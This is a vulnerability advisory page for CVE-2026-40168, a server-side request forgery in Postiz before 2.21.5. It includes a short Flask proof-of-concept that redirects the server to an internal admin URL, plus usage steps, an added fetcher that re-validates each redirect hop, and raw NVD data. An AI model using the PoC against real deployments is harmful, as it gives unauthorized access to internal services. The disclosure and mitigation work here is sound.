Security Vulnerability Report
CVE-2026-40168 CVSS 8.2 HIGH

CVE-2026-40168

Published: 2026-04-10 20:16:23
Last Modified: 2026-04-14 20:09:04

Description

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gitroom:postiz:*:*:*:*:*:*:*:* - VULNERABLE
Postiz < 2.21.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-40168 (Postiz SSRF)
# This script simulates an attacker-controlled server that redirects to an internal resource.
from flask import Flask, redirect

app = Flask(__name__)


@app.route('/poc')
def redirect_to_internal():
    # The target internal resource (e.g., internal admin panel, metadata service)
    target_internal_url = "http://127.0.0.1:8080/admin"
    return redirect(target_internal_url, code=302)


if __name__ == '__main__':
    # Attacker runs this server on a public IP
    app.run(host='0.0.0.0', port=80)

# Usage:
# Send a request to the vulnerable Postiz endpoint:
# POST /api/public/stream
# { "url": "http://<attacker-ip>/poc" }
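The defensive counterpart to the description and PoC above, as an added example that is neither Postiz's code nor its 2.21.5 patch: a server-side fetcher that refuses to follow redirects automatically, and instead applies the same host validation to every Location target that it applied to the user-supplied URL. The hostnames `redirector.example` and `feed.example`, the DNS answers in `SAMPLE_DNS`, and the `sample_opener` responses are constructed fixtures so the script runs offline; `urllib_open` is the real single-hop fetch used when no fixture is supplied.

```python
# Added example (not Postiz's code or its patch): a fetcher that re-validates
# the destination on every redirect hop, the check the advisory says was missing.
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

MAX_REDIRECTS = 5
# RFC 6598 shared address space; older Pythons do not flag it via is_private.
SHARED_ADDRESS_SPACE = ipaddress.ip_network("100.64.0.0/10")


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    if addr.version == 4 and addr in SHARED_ADDRESS_SPACE:
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def resolve_all(hostname: str) -> set:
    """Every A/AAAA answer for the host; an IP literal resolves to itself."""
    try:
        return {str(ipaddress.ip_address(hostname))}
    except ValueError:
        pass
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def validate_destination(url: str, resolver=resolve_all) -> str:
    """Reject non-HTTP schemes and any host with a single non-public answer."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("URL has no host")
    for ip in resolver(parts.hostname):
        if not is_public_address(ip):
            raise ValueError(f"{parts.hostname} resolves to non-public {ip}")
    return url


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface 3xx as HTTPError instead of following it


def urllib_open(url: str):
    """One hop, redirects not followed. Returns (status, location, body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, None, resp.read()
    except urllib.error.HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err.code, err.headers.get("Location"), b""
        raise


def fetch_validated(url, opener=urllib_open, resolver=resolve_all,
                    max_redirects=MAX_REDIRECTS):
    """Follow redirects manually, validating every hop before requesting it."""
    current = validate_destination(url, resolver)
    hops = [current]
    for _ in range(max_redirects + 1):
        status, location, body = opener(current)
        if location is None:
            return current, body, hops
        # The missing check: the Location target gets exactly the validation
        # the user-supplied URL got, before any request is sent to it.
        current = validate_destination(urljoin(current, location), resolver)
        hops.append(current)
    raise ValueError("too many redirects")


# Constructed offline fixtures (hypothetical hosts and answers, not real data).
SAMPLE_DNS = {"redirector.example": {"93.184.216.34"},
              "feed.example": {"93.184.216.34"}}


def sample_resolver(hostname):
    return SAMPLE_DNS.get(hostname) or resolve_all(hostname)


def sample_opener(url):
    """Models the PoC server: the public host answers with a 302 to loopback."""
    if urlsplit(url).hostname == "redirector.example":
        return 302, "http://127.0.0.1:8080/admin", b""
    return 200, None, b"stream-body"


def demo() -> bool:
    """True when the hop to 127.0.0.1 is refused and a clean URL still fetches."""
    try:
        fetch_validated("https://redirector.example/poc",
                        opener=sample_opener, resolver=sample_resolver)
        return False
    except ValueError as err:
        print("blocked:", err)
    _, body, hops = fetch_validated("https://feed.example/rss",
                                    opener=sample_opener, resolver=sample_resolver)
    return body == b"stream-body" and hops == ["https://feed.example/rss"]


if __name__ == "__main__":
    print("redirect re-validation works:", demo())
```

One caveat a reviewer should keep in mind: `validate_destination` resolves the name once and the HTTP client resolves it again when connecting, so a host whose DNS answer changes between the two lookups is not covered by this check alone. Closing that gap means connecting to the address that was validated (pinning the resolved IP while still sending the original Host/SNI), which is outside what this example shows.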

References

https://github.com/gitroomhq/postiz-app/commit/30e8b777098157362769226d1b46d83ad616cb06 (Patch)
https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.5 (Product, Release Notes)
https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40168", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:22.643", "lastModified": "2026-04-14T20:09:03.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitroom:postiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.21.5", "matchCriteriaId": "F8244F9F-08C4-4279-883D-470D3C7145F8"}]}]}], "references": [{"url": "https://github.com/gitroomhq/postiz-app/commit/30e8b777098157362769226d1b46d83ad616cb06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww", "source": "[email protected]", "tags": ["Exploit", 
"Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}